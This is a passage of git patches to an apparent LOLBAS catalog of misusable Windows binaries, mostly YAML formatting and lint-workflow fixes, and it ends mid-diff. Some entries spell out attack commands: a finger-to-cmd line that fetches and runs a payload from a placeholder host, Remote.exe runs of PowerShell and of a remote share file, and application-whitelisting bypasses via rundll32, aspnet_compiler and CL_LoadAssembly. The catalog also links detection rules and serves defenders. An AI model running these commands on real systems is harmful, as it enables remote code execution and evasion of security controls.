Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index ee6f3ce..ec3001d 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index e1de666..2cfb356 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -19,7 +19,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Full_Path: - - Path: + - Path: no default Code_Sample: - Code: Detection: From 68e5795aec4caee5c7352caaca975b88721abf90 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:20:05 -0400 Subject: [PATCH 40/60] Fixing Acknowledgement values. --- yml/OtherMSBinaries/Procdump.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index fda943a..ce3205e 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -31,5 +31,5 @@ Detection: Resources: - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 Acknowledgement: - - Name: Alfie Champion + - Person: Alfie Champion Handle: '@ajpc500' From 6e253a7a38df657799a3aea0d1d54925c23bfac5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:22:36 -0400 Subject: [PATCH 41/60] Adding missing OperatingSystem values. --- yml/OtherMSBinaries/Remote.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 2879a6e..cb0d65d 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -10,21 +10,21 @@ Commands: Category: AWL Bypass Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: T1127 - OperatingSystem: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe From e91d11efc0ed7ad6945ec508f6f9c8e8696f8fa2 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:28:17 -0400 Subject: [PATCH 42/60] Combining yaml linting and validation --- .github/workflows/validate-yaml-schema.yml | 31 ---------------------- .github/workflows/yaml-linting.yml | 22 ++++++++++++++- 2 files changed, 21 insertions(+), 32 deletions(-) delete mode 100644 .github/workflows/validate-yaml-schema.yml diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml deleted file mode 100644 index 0ebaa39..0000000 --- a/.github/workflows/validate-yaml-schema.yml +++ /dev/null @@ -1,31 +0,0 @@ -name: Validate YAML Schema - -on: [push, pull_request] - -jobs: - build: - - runs-on: ubuntu-latest - - steps: - - uses: actions/checkout@v3 - - name: Validate OSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml - - name: Validate OSLibraries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml - - name: Validate OSScripts YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml - - name: Validate OtherMSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 2150f0e..5f99cae 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -1,5 +1,5 @@ --- -name: YAML Lint Push Check +name: YAML Lint and Validation Push Check on: [push] jobs: @@ -11,3 +11,23 @@ jobs: uses: ibiqlik/action-yamllint@v3 with: config_file: .github/.yamllint + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml From fde53748f287bc6b9e9ab843f6403b02e062b59c Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:30:03 -0400 Subject: [PATCH 43/60] Fixed indent in yaml linting workflow --- .github/workflows/yaml-linting.yml | 40 +++++++++++++++--------------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 5f99cae..9835bb7 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -11,23 +11,23 @@ jobs: uses: ibiqlik/action-yamllint@v3 with: config_file: .github/.yamllint - - name: Validate OSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml - - name: Validate OSLibraries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml - - name: Validate OSScripts YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml - - name: Validate OtherMSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml + - name: Validate OSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: cketti/action-pykwalify@v0.3-temp-fix + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml From 7bb5a8a8e3e3a6c2866e9b7864616afd59b4b337 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 00:38:05 -0400 Subject: [PATCH 44/60] Updating yaml lint check to only check the yml folder --- .github/workflows/yaml-linting.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 9835bb7..51b9c40 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -10,6 +10,7 @@ jobs: - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: + file_or_dir: yml/**/*.yml config_file: .github/.yamllint - name: Validate OSBinaries YAML Schema uses: cketti/action-pykwalify@v0.3-temp-fix From 98813fe01b5724729d8f0e556ae0e6dc48d8b9e2 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 01:07:18 -0400 Subject: [PATCH 45/60] Fixing errors found in yaml lint action. --- .github/.yamllint.swp | Bin 0 -> 12288 bytes yml/OSBinaries/Atbroker.yml | 12 +++++------- yml/OSBinaries/Cmd.yml | 12 +++++------- yml/OSBinaries/Cmdkey.yml | 4 +--- yml/OSBinaries/Cmstp.yml | 18 ++++++++---------- yml/OSBinaries/Control.yml | 18 +++++++++--------- yml/OSBinaries/Csc.yml | 12 ++++++------ yml/OSBinaries/Cscript.yml | 22 +++++++++++----------- yml/OSBinaries/Dfsvc.yml | 4 ++-- yml/OSBinaries/Diskshadow.yml | 10 +++++----- yml/OSBinaries/Dnscmd.yml | 6 +++--- yml/OSBinaries/Esentutl.yml | 14 +++++++------- yml/OSBinaries/Expand.yml | 6 +++--- yml/OSBinaries/Extrac32.yml | 6 +++--- yml/OSBinaries/Findstr.yml | 4 ++-- yml/OSBinaries/Forfiles.yml | 4 ++-- yml/OSBinaries/Ftp.yml | 6 +++--- yml/OSBinaries/Infdefaultinstall.yml | 6 +++--- yml/OSBinaries/Mmc.yml | 6 +++--- yml/OSBinaries/Msbuild.yml | 2 +- yml/OSBinaries/Pnputil.yml | 2 +- yml/OSBinaries/Regsvr32.yml | 2 +- yml/OSBinaries/Runscripthelper.yml | 2 +- yml/OSBinaries/Schtasks.yml | 2 +- yml/OSBinaries/Wscript.yml | 2 +- yml/OSBinaries/Wuauclt.yml | 2 +- yml/OSLibraries/Desk.yml | 2 +- yml/OSLibraries/Dfshim.yml | 4 ++-- yml/OSLibraries/Shdocvw.yml | 8 ++++---- yml/OSScripts/pester.yml | 2 +- 30 files changed, 96 insertions(+), 104 deletions(-) create mode 100644 .github/.yamllint.swp diff --git a/.github/.yamllint.swp b/.github/.yamllint.swp new file mode 100644 index 0000000000000000000000000000000000000000..51bfcb2b025a8904c6942b2acc5f5e688b7b785d GIT binary patch literal 12288 zcmeI&Jx;?g7zSVmW`5K%G8h;tAvtM_gitovDitvxx-qzon;KlFN?qD6FeC234H(!t z0viY509=8AFC|?NRp~~h*U~E|@n***ZlE8U!E!0SG_<0uX=z1Rwwb2teS!3vg;i-6#|Cp-e69RcD-Q8!79g z(}@k~^p^^&hJv=OtNx7fY)lwsW7nBc;b Date: Sun, 11 Sep 2022 01:08:37 -0400 Subject: [PATCH 46/60] Changing yaml lint to error on unwanted conditions. --- .github/.yamllint | 8 ++++---- .github/.yamllint.swp | Bin 12288 -> 0 bytes 2 files changed, 4 insertions(+), 4 deletions(-) delete mode 100644 .github/.yamllint.swp diff --git a/.github/.yamllint b/.github/.yamllint index 10d94dd..7452167 100644 --- a/.github/.yamllint +++ b/.github/.yamllint @@ -4,12 +4,12 @@ yaml-files: - '*.yml' rules: new-line-at-end-of-file: - level: warning + level: error trailing-spaces: - level: warning + level: error line-length: level: warning new-lines: - level: warning + level: error indentation: - level: warning + level: error diff --git a/.github/.yamllint.swp b/.github/.yamllint.swp deleted file mode 100644 index 51bfcb2b025a8904c6942b2acc5f5e688b7b785d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI&Jx;?g7zSVmW`5K%G8h;tAvtM_gitovDitvxx-qzon;KlFN?qD6FeC234H(!t z0viY509=8AFC|?NRp~~h*U~E|@n***ZlE8U!E!0SG_<0uX=z1Rwwb2teS!3vg;i-6#|Cp-e69RcD-Q8!79g z(}@k~^p^^&hJv=OtNx7fY)lwsW7nBc;b Date: Sun, 11 Sep 2022 01:23:21 -0400 Subject: [PATCH 47/60] Fixing more formatting errors. --- .github/workflows/yaml-linting.yml | 1 + yml/OSBinaries/Extexport.yml | 2 +- yml/OSBinaries/Installutil.yml | 8 ++++---- yml/OSBinaries/Vbc.yml | 6 +++--- 4 files changed, 9 insertions(+), 8 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 51b9c40..5782c37 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -10,6 +10,7 @@ jobs: - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: + no_warnings: true file_or_dir: yml/**/*.yml config_file: .github/.yamllint - name: Validate OSBinaries YAML Schema diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 14aef3f..5b8080d 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -15,7 +15,7 @@ Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe Code_Sample: - - Code: + - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml - IOC: Extexport.exe loads dll and is execute from other folder the original path diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 8514236..b257c39 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -24,11 +24,11 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml + - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 6f41d61..775a788 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -22,10 +22,10 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe Code_Sample: - - Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml Acknowledgement: - Person: Lior Adar Handle: From 654cdd2d61ae72cebfbbb44ab9c1e49876593803 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sun, 11 Sep 2022 01:33:36 -0400 Subject: [PATCH 48/60] Fixing file formating. --- yml/OSBinaries/.AppInstaller.yml.swp | Bin 0 -> 12288 bytes yml/OSBinaries/Aspnet_Compiler.yml | 54 ++++++------- yml/OSBinaries/Finger.yml | 60 +++++++------- yml/OSLibraries/Dfshim.yml | 56 ++++++------- yml/OSScripts/CL_LoadAssembly.yml | 48 +++++------ yml/OtherMSBinaries/Fsi.yml | 76 +++++++++--------- yml/OtherMSBinaries/Procdump.yml | 70 ++++++++-------- yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 60 +++++++------- yml/OtherMSBinaries/Wfc.yml | 54 ++++++------- 9 files changed, 239 insertions(+), 239 deletions(-) create mode 100644 yml/OSBinaries/.AppInstaller.yml.swp diff --git a/yml/OSBinaries/.AppInstaller.yml.swp b/yml/OSBinaries/.AppInstaller.yml.swp new file mode 100644 index 0000000000000000000000000000000000000000..93cd402447f998b7fc3ec2217ffa41a78a3485f2 GIT binary patch literal 12288 zcmeI2&yU+g6vt=bNGqx$aYK55s$6hvC+U*4_?0G98!6d@WJ8OHWR2}{GK%eSXU6O1 zLeKmG@IP?jPvF9(`~mz0h!b}%po(WFtEP*pMdAdSk-i#b-piYr&wF!-@&f1c;TXEj z7Qu0gknhjl3V;0i_R+JauaZz?LRRb73`u#!{(<9HbwIlma>KKgJ(`T}_2&D@a_w!J z*pvA^o>9q}vU_D_nUhBt06UhZ!! zhJYbp2p9r}fFWQA7y^cXA@IK=pz|a01aI}q{$_9P=c6n0{-c=;0YktLFa!(%L%=?&u$X(GwKJ_ zcc^bs7pM*D_Zx)#hWZjUMcqLCfw6zt@A0(S#|%Tj5HJJ`0YktLFa!(%L%SI6S`dUaKp9@0${B0AaFdBLVbO}EEYn`?IO5sHgSFPV z@@!j|Tx)E<4Ml1{4{2jpt}c}Aw%hF!$8p>5x7w|{sN)WqF(nEaGPMgg=c|-HkGJA_ zT?BQw+H(4tttt;YNJL-8 zmpqF^sq83I{-c7)ZMEV@k9>?pl~41WztBHCV48)RBZeIks@ER$z2#Jjm82=$=NNVQ zU>6m;kJWO_Ln)Mqb#uVfMvMHgC)szKuG_?WyG_S`eBAN+$| zu;se)>r>5ELT)`6h%!qA{-Udv(H>HT#c;U_F@6?wDR9bY%I;Jw2UOGLNQ5+5PIqCh%g>c`^q0dkru#Hp zv*ib~-q~O>wz^jTv^TQ`!`Y|(^U3UskC2E3eUYYkDi5&ErG`{l^q`jTS$w>!@eePb zNlr0?0nh5fmbA2Ww4JZZQAzfp@HO-$!$e`wM$2hAmfNzNR)h2ky%rJ|4<2TNypWP} vAre3oQB8Ue6AMRVAmS=v5AE@M_z>`n2@h+70yG|!(-}ha{+3%}Sr+*V_JpM> literal 0 HcmV?d00001 diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index ee23cf7..df6283e 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -1,27 +1,27 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 4627f7c..936098f 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -1,30 +1,30 @@ ---- -Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon -Author: Ruben Revuelta -Created: 2021-08-30 -Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 -Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. -Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) -Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' +--- +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: + - Command: finger user@example.host.com | more +2 | cmd + Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 +Full_Path: + - Path: c:\windows\system32\finger.exe + - Path: c:\windows\syswow64\finger.exe +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml + - IOC: finger.exe should not be run on a normal workstation. + - IOC: finger.exe connecting to external resources. +Resources: + - Link: https://twitter.com/DissectMalware/status/997340270273409024 + - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: + - Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' + - Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' + - Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index c16451c..ffec91d 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -1,28 +1,28 @@ ---- -Name: Dfshim.dll -Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' -Created: 2018-05-25 -Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml -Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe -Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' +--- +Name: Dfshim.dll +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' +Created: 2018-05-25 +Commands: + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +Resources: + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index a227eaf..91b6b26 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -1,24 +1,24 @@ ---- -Name: CL_LoadAssembly.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml -Resources: - - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index f427c5a..fe18464 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ 